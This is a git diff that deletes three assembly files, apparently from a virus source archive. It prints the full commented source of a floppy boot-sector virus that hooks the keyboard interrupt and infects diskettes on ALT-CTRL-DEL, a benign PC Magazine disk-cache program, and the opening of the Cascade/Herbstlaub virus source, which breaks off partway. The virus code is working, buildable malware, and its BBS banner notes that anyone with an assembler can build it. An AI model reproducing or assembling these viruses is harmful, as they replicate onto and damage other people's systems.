@@ -1,431 +0,0 @@ -;****************************************************************************; -; ; -; -=][][][][][][][][][][][][][][][=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] [=- ; -; -=] For All Your H/P/A/V Files [=- ; -; -=] SysOp: Peter Venkman [=- ; -; -=] [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=][][][][][][][][][][][][][][][=- ; -; ; -; *** NOT FOR GENERAL DISTRIBUTION *** ; -; ; -; This File is for the Purpose of Virus Study Only! It Should not be Passed ; -; Around Among the General Public. It Will be Very Useful for Learning how ; -; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; -; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; -; Experience can Turn it Into a far More Malevolent Program Than it Already ; -; Is. Keep This Code in Responsible Hands! ; -; ; -;****************************************************************************; -;-----------------------------------------------------------------------; -; This virus is of the ?FLOPPY ONLY? variety. ; -; It replicates to the boot sector of a floppy disk and when it gains control -; it will move itself to upper memory. It redirects the keyboard ; -; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ; -; it will attempt to infect any floppy it finds in drive A:. ; -; It keeps the real boot sector at track 39, sector 8, head 0 ; -; It does not map this sector bad in the fat (unlike the Pakistani Brain) -; and should that area be used by a file, the virus ; -; will die. It also contains no anti detection mechanisms as does the ; -; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ; -; sector 9 because this is common to all floppy formats both single ; -; sided and double sided. It does not contain any malevolent TROJAN ; -; HORSE code. 
It does appear to contain a count of how many times it ; -; has infected other diskettes although this is harmless and the count ; -; is never accessed. ; -; ; -; Things to note about this virus: ; -; It can not only live through an ALT-CTRL-DEL reboot command, but this ; -; is its primary (only for that matter) means of reproduction to other ; -; floppy diskettes. The only way to remove it from an infected system ; -; is to turn the machine off and reboot an uninfected copy of DOS. ; -; It is even resident when no floppy is booted but BASIC is loaded ; -; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ; -; it activates and infectes the floppy from which the user is ; -; attempting to boot. ; -; ; -; Also note that because of the POP CS command to pass control to ; -; its self in upper memory, this virus does not to work on 80286 ; -; machines (because this is not a valid 80286 instruction). ; -; ; -; If your assembler will not allow the POP CS command to execute, replace; -; the POP CS command with an NOP and then assemble it, then debug that ; -; part of the code and place POP CS in place of NOP at that section. ; -; ; -; The Norton Utilities can be used to identify infected diskettes by ; -; looking at the boot sector and the DOS SYS utility can be used to ; -; remove it (unlike the Pakistani Brain). ; -;-----------------------------------------------------------------------; - ; - ORG 7C00H ; - ; -TOS LABEL WORD ;TOP OF STACK -;-----------------------------------------------------------------------; -; 1. Find top of memory and copy ourself up there. (keeping same offset); -; 2. Save a copy of the first 32 interrupt vectors to top of memory too ; -; 3. Redirect int 9 (keyboard) to ourself in top of memory ; -; 4. Jump to ourself at top of memory ; -; 5. 
Load and execute REAL boot sector from track 40, head 0, sector 8 ; -;-----------------------------------------------------------------------; -BEGIN: CLI ;INITIALIZE STACK - XOR AX,AX ; - MOV SS,AX ; - MOV SP,offset TOS ; - STI ; - ; - MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512) - MOV DS,BX ; - MOV AX,[0013H] ; - MUL BX ; - SUB AX,07E0H ; (7C00H+512)/16 - MOV ES,AX ; - ; - PUSH CS ;DS = CS - POP DS ; - ; - CMP DI,3456H ;IF THE VIRUS IS REBOOTING... - JNE B_10 ; - DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1-- - ; -B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY - MOV DI,SI ; - MOV CX,512 ; - CLD ; - REP MOVSB ; - ; - MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO - MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE - MOV CX,128 ; - REP MOVSB ; - ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - ; - PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH - POP CS - ; - PUSH DS ;DS=0 ; ES = DS - POP ES ; - ; - MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00 - MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0 - MOV CX,2708H ; TRACK 40, SECTOR 8 - MOV AX,0201H ; READ SECTOR - INT 13H ; (common to 8/9 sect. 1/2 sided!) - JB $ ; HANG IF ERROR - ; - JMP JMP_BOOT ;JMP 0000:7C00 - ; -;-----------------------------------------------------------------------; -; SAVE THEN REDIRECT INT 9 VECTOR ; -; ; -; ON ENTRY: DS = 0 ; -; ES = WHERE TO SAVE OLD_09 & (HI) ; -; WHERE NEW_09 IS (HI) ; -;-----------------------------------------------------------------------; -PUT_NEW_09: ; - DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024 - ; - MOV SI,9*4 ;COPY INT 9 VECTOR TO - MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!) 
- MOV CX,0004 ; - ; - CLI ; - REP MOVSB ; - MOV Word Ptr [9*4],offset NEW_09 - MOV [(9*4)+2],ES ; - STI ; - ; - RET ; - ; -;-----------------------------------------------------------------------; -; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ; -;-----------------------------------------------------------------------; -ACK_KEYBD: ; - IN AL,61H ;RESET KEYBOARD THEN CONTINUE - MOV AH,AL ; - OR AL,80H ; - OUT 61H,AL ; - XCHG AL,AH ; - OUT 61H,AL ; - JMP RBOOT ; - ; -;-----------------------------------------------------------------------; -; DATA AREA WHICH IS NOT USED IN THIS VERSION ; -; REASON UNKNOWN ; -;-----------------------------------------------------------------------; -TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39 - DB 27H,0,2,2 ; (CURRENTLY NOT USED) - DB 27H,0,3,2 ; - DB 27H,0,4,2 ; - DB 27H,0,5,2 ; - DB 27H,0,6,2 ; - DB 27H,0,7,2 ; - DB 27H,0,8,2 ; - ; -;A7C9A LABEL BYTE ; - DW 00024H ;NOT USED - DB 0ADH ; - DB 07CH ; - DB 0A3H ; - DW 00026H ; - ; -;L7CA1: ; - POP CX ;NOT USED - POP DI ; - POP SI ; - POP ES ; - POP DS ; - POP AX ; - POPF ; - JMP 1111:1111 ; - ; -;-----------------------------------------------------------------------; -; IF ALT & CTRL & DEL THEN ... ; -; IF ALT & CTRL & ? THEN ... ; -;-----------------------------------------------------------------------; -NEW_09: PUSHF ; - STI ; - ; - PUSH AX ; - PUSH BX ; - PUSH DS ; - ; - PUSH CS ;DS=CS - POP DS ; - ; - MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME - IN AL,60H ;GET SCAN CODE - MOV AH,AL ;SAVE IN AH - AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH - ; - CMP AL,1DH ;IS IT A [CTRL]... - JNE N09_10 ;...JUMP IF NO - MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP) - JMP N09_30 ; - ; -N09_10: CMP AL,38H ;IS IT AN [ALT]... - JNE N09_20 ;...JUMP IF NO - MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP) - JMP N09_30 ; - ; -N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)... - JNE N09_30 ;...JUMP IF NO - ; - CMP AL,17H ;IF [I]... - JE N09_X0 ;...JUMP IF YES - CMP AL,53H ;IF [DEL]... 
- JE ACK_KEYBD ;...JUMP IF YES - ; -N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME - ; -N09_90: POP DS ; - POP BX ; - POP AX ; - POPF ; - ; - DB 0EAH ;JMP F000:E987 -OLD_09 DW ? ; - DW 0F000H ; - ; -N09_X0: JMP N09_X1 ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!? - MOV AX,0800H ;AL=0, AH=DELAY ARG - OUT DX,AL ; - CALL DELAY ; - MOV [ALT_CTRL],AX ;AX=0 ; - ; - MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR - INT 10H ; - MOV AH,2 ;SET CURSOR POS 0,0 - XOR DX,DX ; - MOV BH,DH ; PAGE 0 - INT 10H ; - ; - MOV AH,1 ;SET CURSOR TYPE - MOV CX,0607H ; - INT 10H ; - ; - MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW) - CALL DELAY ; - ; - CLI ; - OUT 20H,AL ;SEND EOI TO INT CONTROLLER - ; - MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS - MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!) - MOV SI,offset BEGIN - 128 ; - MOV CX,128 ; - CLD ; - REP MOVSB ; - ; - MOV DS,CX ;CX=0 ;DS=0 - ; - MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR - MOV [(19H*4)+2],CS ; - ; - MOV AX,0040H ;DS = ROM DATA AREA - MOV DS,AX ; - ; - MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0 - INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE) - ; - PUSH DS ;IF BIOS F000:E502 == 21E4... - MOV AX,0F000H ; - MOV DS,AX ; - CMP Word Ptr [0E502H],21E4H ; - POP DS ; - JE R_90 ; - INT 19H ; IF NOT...REBOOT - ; -R_90: JMP 0F000:0E502H ;...DO IT ?!?!?! - ; -;-----------------------------------------------------------------------; -; REBOOT INT VECTOR ; -;-----------------------------------------------------------------------; -NEW_19: XOR AX,AX ; - ; - MOV DS,AX ;DS=0 - MOV AX,[0410] ;AX=EQUIP FLAG - TEST AL,1 ;IF FLOPPY DRIVES ... 
- JNZ N19_20 ;...JUMP -N19_10: PUSH CS ;ELSE ES=CS - POP ES ; - CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - INT 18H ;LOAD BASIC - ; -N19_20: MOV CX,0004 ;RETRY COUNT = 4 - ; -N19_22: PUSH CX ; - MOV AH,00 ;RESET DISK - INT 13 ; - JB N19_81 ; - MOV AX,0201 ;READ BOOT SECTOR - PUSH DS ; - POP ES ; - MOV BX,offset BEGIN ; - MOV CX,1 ;TRACK 0, SECTOR 1 - INT 13H ; -N19_81: POP CX ; - JNB N19_90 ; - LOOP N19_22 ; - JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC - ; -;-----------------------------------------------------------------------; -; Reinfection segment. ; -;-----------------------------------------------------------------------; -N19_90: CMP DI,3456 ;IF NOT FLAG SET... - JNZ RE_INFECT ;...RE INFECT - ; -JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR - JMP 0000:7C00H ; - ; -;-----------------------------------------------------------------------; -; Reinfection Segment. ; -;-----------------------------------------------------------------------; -RE_INFECT: ; - MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH - MOV CX,00E6H ; OURSELF - MOV DI,SI ; - PUSH CS ; - POP ES ; - CLD ; - REPE CMPSB ; - JE RI_12 ;IF NOT EQUAL... - ; - INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!) - ; -;MAKE SURE TRACK 39, HEAD 0 FORMATTED ; - MOV BX,offset TABLE ;FORMAT INFO - MOV DX,0000 ;DRIVE A: HEAD 0 - MOV CH,40-1 ;TRACK 39 - MOV AH,5 ;FORMAT - JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW ! - ; -; <<< NO EXECUTION PATH TO HERE >>> ; - JB RI_80 ; - ; -;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0 -RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0 - MOV BX,offset BEGIN ;TRACK 40H - MOV CL,8 ;SECTOR 8 - MOV AX,0301H ;WRITE 1 SECTOR - INT 13H ; - ; - PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW) - POP ES ; - JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE - ; - MOV CX,0001 ;WRITE INFECTED BOOT SECTOR ! - MOV AX,0301 ; - INT 13H ; - JB RI_80 ; IF ERROR...JUMP TO BOOT CODE - ; -RI_12: MOV DI,3456H ;SET ?JUST INFECTED ANOTHER ONE?... 
- INT 19H ;...FLAG AND REBOOT - ; -RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD) - DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT) - JMP JMP_BOOT ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS - ; - MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG - MOV BX,0040H ; - MOV DS,BX ; - MOV [0072H],AX ; 0040:0072 = RESET FLAG - JMP N09_90 ; - ; -;-----------------------------------------------------------------------; -; DELAY ; -; ; -; ON ENTRY AH:CX = LOOP COUNT ; -;-----------------------------------------------------------------------; -DELAY: SUB CX,CX ; -D_01: LOOP $ ; - SUB AH,1 ; - JNZ D_01 ; - RET ; - ; -;-----------------------------------------------------------------------; -; ; -;-----------------------------------------------------------------------; -A7DF4 DB 27H,00H,8,2 - -COUNTER_1 DW 001CH -ALT_CTRL DW 0 -A7DFC DB 27H,0,8,2 - -;****************************************************************************; -; ; -; -=][][][][][][][][][][][][][][][=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] [=- ; -; -=] For All Your H/P/A/V Files [=- ; -; -=] SysOp: Peter Venkman [=- ; -; -=] [=- ; -; -=] +31.(o)79.426o79 [=- ; -; -=] P E R F E C T C R I M E [=- ; -; -=][][][][][][][][][][][][][][][=- ; -; ; -; *** NOT FOR GENERAL DISTRIBUTION *** ; -; ; -; This File is for the Purpose of Virus Study Only! It Should not be Passed ; -; Around Among the General Public. It Will be Very Useful for Learning how ; -; Viruses Work and Propagate. But Anybody With Access to an Assembler can ; -; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ; -; Experience can Turn it Into a far More Malevolent Program Than it Already ; -; Is. Keep This Code in Responsible Hands! 
; -; ; -;****************************************************************************; diff --git a/c/CACHE (31).ASM b/c/CACHE (31).ASM deleted file mode 100755 index 84bd8c6..0000000 --- a/c/CACHE (31).ASM +++ /dev/null 
@@ -1,255 +0,0 @@ -INTERRUPTS SEGMENT AT 0H ;This is where the disk interrupt - ORG 13H*4 ;holds the address of its service routine -DISK_INT LABEL DWORD -INTERRUPTS ENDS - -CODE_SEG SEGMENT - ASSUME CS:CODE_SEG - ORG 100H ;ORG = 100H to make this into a .COM file -FIRST: JMP LOAD_CACHE ;First time through jump to initialize routine - - CPY_RGT DB '(C)1985 S.Holzner' ;A signature in bytes - TBL_LEN DW 64 ;<-- # OF SECTORS TO STORE IN CACHE, MIN=24, MAX=124. - ;THIS IS THE ONLY PLACE YOU MUST SET THIS NUMBER. EACH SECTOR = 512 BYTES. - TIME DW 0 ;Time used to time-stamp each sector - OLD_CX DW 0 ;Stores original value of CX (CX is used often) - LOW_TIM DW 0 ;Used in searching for least recently used sect. - INT13H DD 0 ;Stores the original INT 13H address - RET_ADR LABEL DWORD ;Playing games with the stack here to preserve - RET_ADR_WORD DW 2 DUP(0) ;flags returned by Int 13H - -DISK_CACHE PROC FAR ;The Disk interrupt will now come here. - ASSUME CS:CODE_SEG - CMP AX,201H ;Is this a read (AH=2) of 1 sector (AL=1)? - JE READ ;Yes, jump to Read - CMP AH,3 ;No. Perchance a write or format? - JB OLD_INT ;No, release control to old disk Int. - JMP WRITE ;Yes, jump to Write -OLD_INT:PUSHF ;Pushf for Int 13H's final Iret - CALL INT13H ;Call the Disk Int - JMP PAST ;And jump past all usual Pops -READ: PUSH BX ;Push just about every register ever heard of - PUSH CX - PUSH DX - PUSH DI - PUSH SI - PUSH DS - PUSH ES - MOV DI,BX ;Int 13H gets data address as ES:BX, switch to ES:DI - ASSUME DS:CODE_SEG ;Make sure all labels found correctly - PUSH CS ;Move CS into DS by pushing CS, popping DS - POP DS - MOV OLD_CX,CX ;Save original CX since we're about to use it - CMP DH,0 ;DH holds requested head -- head 0? - JNE NOT_FAT1 ;Nope, this can't be the first Fat sector - CMP CX,6 ;If this is the directory, check if we have a - JE FAT1 ; new disk. - CMP CX,2 ;Track 0 (CH)? Sector 2 (CL)? 
- JNE NOT_FAT1 ;If not, this sure isn't the FAT1 -FAT1: CALL FIND_MATCH ;DOS reads in this sector first to check disk format - JCXZ NONE ;We'll use it for a check-sum. Do we have it - MOV BX,DI ; stored yet? CX=0-->no. If yes, restore BX - MOV CX,OLD_CX ; and CX from original values - PUSHF ;And now do the Pushf and call of Int13H to read - CALL INT13H ; FAT1 - JC ERR ;If error, leave - MOV CX,256 ;No error, FAT1 was read, check our value -REPE CMPSW ; with CMPSW -- if no match, disk was changed - JCXZ BYE ;Everything checks out, Bingo, exit. - LEA SI,TABLE ;New Disk! Zero all the old disk's sectors - MOV CX,TBL_LEN ;Loop over all entries, DL holds drive # -CLR: CMP DS:[SI+2],DL ;Is this stored sector from the old disk? - JNE NO_CLR ;Nope, don't clear this entry - MOV WORD PTR DS:[SI],0 ;Match, zero this entry, zero first word -NO_CLR: ADD SI,518 ;Move on to next stored sector (512 bytes of stored - LOOP CLR ; sector and 3 words of identification & time-stamp) - JMP BYE ;Reset for new disk, let's leave -NONE: CALL STORE_SECTOR ;Store FAT1 if there was no match to it - JC ERR ;Error -- exit ungraciously - JMP BYE ;No Error, Bye. -NOT_FAT1: ;The requested sector was not FAT1. Let's - CALL FIND_MATCH ;get it. Or do we have it already? - JCXZ NO_MATCH ;No, jump to No_Match, store sector - MOV CX,512 ;ES:DI and DS:SI already set up from Find_Match -REP MOVSB ;Move 512 bytes to requested memory area - CMP WORD PTR [BX+4],0FFFFH ;Is this a a directory sector? - JE BYE ;Yes, don't reset time (already highest poss.) - INC TIME ;No, reset the time, this sector just accessed - MOV AX,TIME ;Move time into Time word of sector's 3 words - MOV [BX+4],AX ; of identification - JMP BYE ;And leave. If there's an article you'd like to -NO_MATCH: ;see, by all means write in C/O PC Magazine. - CALL STORE_SECTOR ;Don't have this sector yet, get it. - JC ERR ;If read failed, exit with error -BYE: CLC ;The exit point. 
Clear carry flag, set AX=1 - MOV AX,1 ; CY=0 --> no error, AH=0 --> error code = 0 -ERR: POP ES ;If error, preserve flags and AX with error code - POP DS ;Pop all conceivable registers (except AX) - POP SI - POP DI - POP DX - POP CX ;Now that the flags are set, we want to get the - POP BX ;old flags off the stack (put there by original -PAST: POP CS:RET_ADR_WORD ;Int call) To do that we save the return address - POP CS:RET_ADR_WORD[2] ;first and then pop the flags harmlessly - POP CS:OLD_CX ;into Old_CX, and then jump to RET_ADR. - JMP CS:RET_ADR ;Done with read. Now let's consider write. -WRITE: PUSH BX ;Push all registers, past and present - PUSH CX - PUSH DX - PUSH DI - PUSH SI - PUSH DS - PUSH ES - PUSH AX - CMP AX,301H ;Is this a write of one sector? - JNE NOSAVE ;No, don't save it in the sector bank - PUSH CS ;Yep, set DS (for call to Int13H label) and - POP DS ; write this sector out - PUSHF - CALL INT13H - JNC SAVE ;If there was an error we don't want to save sector - POP CS:OLD_CX ;Save AH error code, Pop old AX into Old_CX - JMP ERR ;And jump to an ignoble exit -SAVE: MOV OLD_CX,CX ;We're going to save this sector. - MOV DI,BX ;Set up DI for string move (to store written - CALL FIND_MATCH ; sector. Do we have it in memory? (set SI) - JCXZ LEAVE ;Nope, Leave (like above's Bye). - XCHG DI,SI ;Exchange destination and source - PUSH ES ;Set up DS:SI to point to where data written - POP DS ; from. We'll then use a string move - PUSH CS ;Set up ES so ES:DI points to sector bank - POP ES ; SI was set by Find_Match, Xchg'd into DI - MOV CX,512 ;Get ready to move 512 bytes -REP MOVSB ;Here we go -LEAVE: POP AX ;Here is the leave - JMP BYE ;Which only pops AX and then jumps to Bye -NOSAVE: PUSH CS ;More than 1 sector written, don't save but - POP DS ; do zero stored sectors that will be written - MOV AH,0 ;Use AX as loop index (AL=# of sectors to write) -TOP: PUSH CX ;Save CX since destroyed by Find_Match - CALL FIND_MATCH ;Do we have this one? 
- JCXZ NOPE ;Nope if CX = 0 - MOV WORD PTR [BX],0 ;There is a match, zero this sector -NOPE: POP CX ;Restore CX, the sector index - INC CL ;Move on to next one - DEC AX ;Decrement loop index - JNZ TOP ;And, unless that gives 0, go back again -POPS: POP AX ;Pop 'em all, starting with AX - POP ES - POP DS - POP SI - POP DI - POP DX - POP CX - POP BX - JMP OLD_INT ;And go back to OLD_INT for write. -DISK_CACHE ENDP - -FIND_MATCH PROC NEAR ;This routine finds a sector in the sector bank - PUSH AX ;And returns SI set to sector's entry, BX set - LEA SI,SECTORS ; to the beginning of the 'table' -- the 3 words - LEA BX,TABLE ;that precede all sectors. If there was no match - MOV AX,TBL_LEN ; CX=0. When Int13H called, CH=trk #, CL=sec. # - XCHG AX,CX ; DH=head #, DL=Drive #. Get Tbl_Len into CX -FIND: CMP DS:[BX],AX ;Compare stored sector's original AX to current - JNE NO ;If not, not. - CMP DS:[BX+2],DX ;If so, check DX of stored sector with current - JE GOT_IT ;Yes, there is a match, leave -NO: ADD BX,518 ;Point to next Table entry - ADD SI,518 ;And next sector too - LOOP FIND ;Keep looping until there is a match -GOT_IT: POP AX ;If there is no match, CX will be left 0 - RET ;Return -FIND_MATCH ENDP - -STORE_SECTOR PROC NEAR ;This routine, as it says, stores sectors - MOV BX,DI ;Original BX (ES:BX was original data address) - MOV CX,OLD_CX ; and CX restored (CX=trk#, Sector#) - PUSHF ;Pushf for Int 13H's Iret and call it - CALL INT13H - JNC ALL_OK ;If there was an exit, exit ignominiously - JMP FIN ;If error, leave CY flag set, code in AH, exit -ALL_OK: PUSH CX ;No error, push used registers - PUSH BX ; and find space for sector in sector bank - PUSH DX - LEA DI,SECTORS ;Point to sector bank - LEA BX,TABLE ; and Table - MOV CX,TBL_LEN ; and get ready to loop over all of them to -CHK0: CMP WORD PTR DS:[BX],0 ;find if there is an unused sector - JE FOUND ;If the first word is 0, use this sector - ADD DI,518 ;But this one isn't so update DI, SI and - ADD BX,518 ; loop again 
- LOOP CHK0 - MOV LOW_TIM,0FFFEH ;All sectors were filled, find least recently - LEA DI,SECTORS ; used and write over that one - LEA SI,TABLE - MOV CX,TBL_LEN ;Loop over all stored sectors -CHKTIM: MOV DX,LOW_TIM ;Compare stored sector to so-far low time - CMP [SI+4],DX - JA MORE_RECENT ;If this one is more recent, don't use it - MOV AX,DI ;This one is older than previous oldest - MOV BX,SI ;Store sector bank address (DI) and table - MOV DX,[SI+4] ; entry (now in SI) - MOV LOW_TIM,DX ;And update the Low Time to this one -MORE_RECENT: - ADD DI,518 ;Move on to next stored sector - ADD SI,518 ;And next table entry - LOOP CHKTIM ;Loop again until all covered - MOV DI,AX ;Get Sector bank address of oldest into DI -FOUND: POP DX ;Restore used registers - POP SI ;Old BX (data read-to-address) --> SI - POP CX - MOV [BX],CX ;Store the new CX as the sector's first word - MOV [BX+2],DX ;2nd word of Table is sector's DX - INC TIME ;Now find the new time - MOV AX,TIME ;Prepare to move it into 3rd word of Table - CMP DH,0 ;Is this directory or FAT? (time-->FFFF) - JNE SIDE1 ;If head is not 0, check other head - CMP CX,9 ;Head zero, trk# 0, first sector? (directory) - JLE DIR ;Yes, this is a piece we always want stored - JMP NOT_DIR ;No, definitely not FAT or directory -SIDE1: CMP DH,1 ;Head 1? - JNE NOT_DIR ;No, this is not File Alloc. Table or directory - CMP CX,2 ;Part of the top of the directory? - JA NOT_DIR ;No, go to Not_Dir and set time -DIR: MOV AX,0FFFFH ;Dir or FAT, set time high so always kept -NOT_DIR:MOV [BX+4],AX ;Not FAT or dir, store the incremented time - PUSH ES ;And now get the data to fill the sector - POP DS ;SI, DI already set. Now set ES and DS for - PUSH CS ; string move. 
- POP ES - MOV CX,512 ;Move 512 bytes -REP MOVSB ;Right here - CLC ;Clear the carry flag (no error) -FIN: RET ;Error exit here (do not reset CY flag) -STORE_SECTOR ENDP -TABLE: DW 3 DUP(0) ;Table and sector storage begins right here -SECTORS: ;First thing to write over is the following - ; booster program. -LOAD_CACHE PROC NEAR ;This procedure intializes everything - LEA BX,CLEAR - ASSUME DS:INTERRUPTS ;The data segment will be the Interrupt area - MOV AX,INTERRUPTS - MOV DS,AX - MOV AX,word ptr DISK_INT ;Get the old interrupt service routine - MOV word ptr INT13H,AX ; address and put it into our location MOV AX,word ptr DISK_INT[2] - ; INT13H so we can call it. - MOV word ptr INT13H[2],AX - MOV word ptr DISK_INT,OFFSET DISK_CACHE ;Now load address of Cache - MOV word ptr DISK_INT[2],CS ;routine into the Disk interrupt - MOV AX,TBL_LEN ;The number of sectors to store in cache - MOV CX,518 ;Multiply by 518 (3 words of id and 512 - MUL CX ; bytes of sector data) - MOV CX,AX ;Also, zero all the bytes so that -ZERO: MOV BYTE PTR CS:[BX],0 ; Store_Sector will find 1st word a 0, - INC BX ; indicating virgin territory. - LOOP ZERO - MOV DX,OFFSET TABLE ;To attach in memory, add # bytes to - ADD DX,AX ;store to Table's location and use - INT 27H ; Int 27H -LOAD_CACHE ENDP -CLEAR: - CODE_SEG ENDS - END FIRST ;END "FIRST" so 8088 will go to FIRST first. - \ No newline at end of file diff --git a/c/CASCADE (33).ASM b/c/CASCADE (33).ASM deleted file mode 100755 index 50095b0..0000000 --- a/c/CASCADE (33).ASM +++ /dev/null 
@@ -1,1188 +0,0 @@ -PAGE 62,132 -TITLE _HLV_ -SUBTTL Layout (C) 1990 164A12565AA18213165556D3125C4B962712 -.RADIX 16 -.LALL - -TRUE EQU 1 -FALSE EQU 0 - -MONTH EQU 9D -YEAR EQU 1991D - -DEMO EQU TRUE - -SWITCHABLE = TRUE -IFDEF _NOSWITCH -SWITCHABLE = FALSE -ENDIF - -comment # -ͻ - - ===================== - H E R B S T L A U B - ===================== - - - SPRACHE: MASM 4.00 (+) [ frhere Versionen brechen z.B. mit - (not v6.00 ! ) *OUT OF MEMORY* (3.00) ab oder lassen - sogar den PC abstrzen (1.10) ] - - ( Eine als Beispiel gedachte Batchdatei zur Steuerung der bersetzung - ist am Ende dieses Quelltextes als Kommentar hinzugefgt. ) - -ͼ -Ŀ - Whrend der bersetzung zu auszugebende Meldungen, 1. Teil. - -# -IF1 -REPT 50 -%Out -ENDM; -%Out ͻ -%Out -%Out Ŀ -%Out Ĵ H E R B S T L A U B İ -%Out ٰ -%Out -ENDIF -comment # -Ŀ - Einige Assembler - Makros. - -# ; -MSDOS MACRO ; - INT 21 ; - ENDM ; -Wait_HRI_or_VRI MACRO ; - LOCAL _X_1, _X_2, _X_3 ; - MOV DX,03DA ; - CLI ; - _X_1: IN AL,DX ; - TEST AL,08 ; - JNZ _X_3 ; - TEST AL,01 ; - JNZ _X_1 ; - _X_2: IN AL,DX ; - TEST AL,01 ; - JZ _X_2 ; - _X_3 LABEL NEAR ; - ENDM ;------; -SAVE MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; - IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; - IFNB <_X> ;------; - IFIDN <_X>, ; - PUSHF ; - ELSE ; - PUSH _X ; - ENDIF ; - ENDIF ; - ENDM ; - ENDM ;------; -REST MACRO _1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c ; - IRP _X,<_1,_2,_3,_4,_5,_6,_7,_8,_9,_a,_b,_c> ; - IFNB <_X> ;------; - IFIDN <_X>, ; - POPF ; - ELSE ; - POP _X ; - ENDIF ; - ENDIF ; - ENDM ; - ENDM ; -MOV_S MACRO S1,S2 ; - PUSH S2 ; - POP S1 ; - ENDM ; - comment # -Ŀ - Start des Code-Segments, Segment Prefix Bytes werden n i c h t au- - tomatisch durch den Assembler erzeugt. - - # ; -TEXT SEGMENT ; - ASSUME CS:TEXT,DS:TEXT,ES:TEXT,SS:TEXT ; - comment # -Ŀ - Einige das Verstndnis erleichternde Definitionen. 
- - # ; -NearJmp EQU 0E9 ; -PORT_B_8259A EQU 20 ; -EOI_8259A EQU 20 ; -PORT_B_8255 EQU 61 ; -FIRSTCONST EQU 0131 ; -FIRSTBASE EQU FIRSTCONST - OFFSET XI_001 ;-----; -FIRSTBASE2 EQU (FIRSTCONST + OFFSET XI_005 - XI_001) ; -DeCrptd EQU 0 ;-----; -EnCrptd EQU 1 ; -BIOSDATASEG EQU 040 ; -MonoBase EQU 0B000 ; -ColorBase EQU 0B800 ; -B_VIDPAGE EQU THIS WORD + 04E ; -B_TIMERVAR EQU THIS WORD + 06C ; -TimerInt EQU 1C ; -DOS EQU 21 ; -DOS_multi EQU 2F ; -MS_SetDTA EQU 1A ; - DTA_in_PSP EQU 80 ; -MS_SetInt EQU 25 ; -MS_GetDateTime EQU 2A ; -MS_GetVer EQU 30 ; - DOS_v_02 EQU 2 ; -MS_GetInt EQU 35 ; -MS_Open EQU 3Dh ; - Read_Only EQU 0 ; - Read_Write EQU 2 ; -MS_Close EQU 3E ; -MS_Read EQU 3F ; -MS_Write EQU 40 ; -MS_MoveFP EQU 42 ; - OfsFrmTop EQU 0 ; - OfsFrmEnd EQU 02 ; -MS_GetFileAttr EQU 4300 ; -MS_SetFileAttr EQU 4301 ; - Attr_A EQU 20 ; - Attr_SHR EQU 7 ; - Attr_ASHR EQU Attr_A OR Attr_SHR ; -MS_AllocMem EQU 48 ; -MS_ReleaseMem EQU 49 ; - MemCBsig EQU THIS BYTE + 0 ; - MemCBowned EQU THIS WORD + 1 ; - MemCBsize EQU THIS WORD + 3 ; -MS_Exec 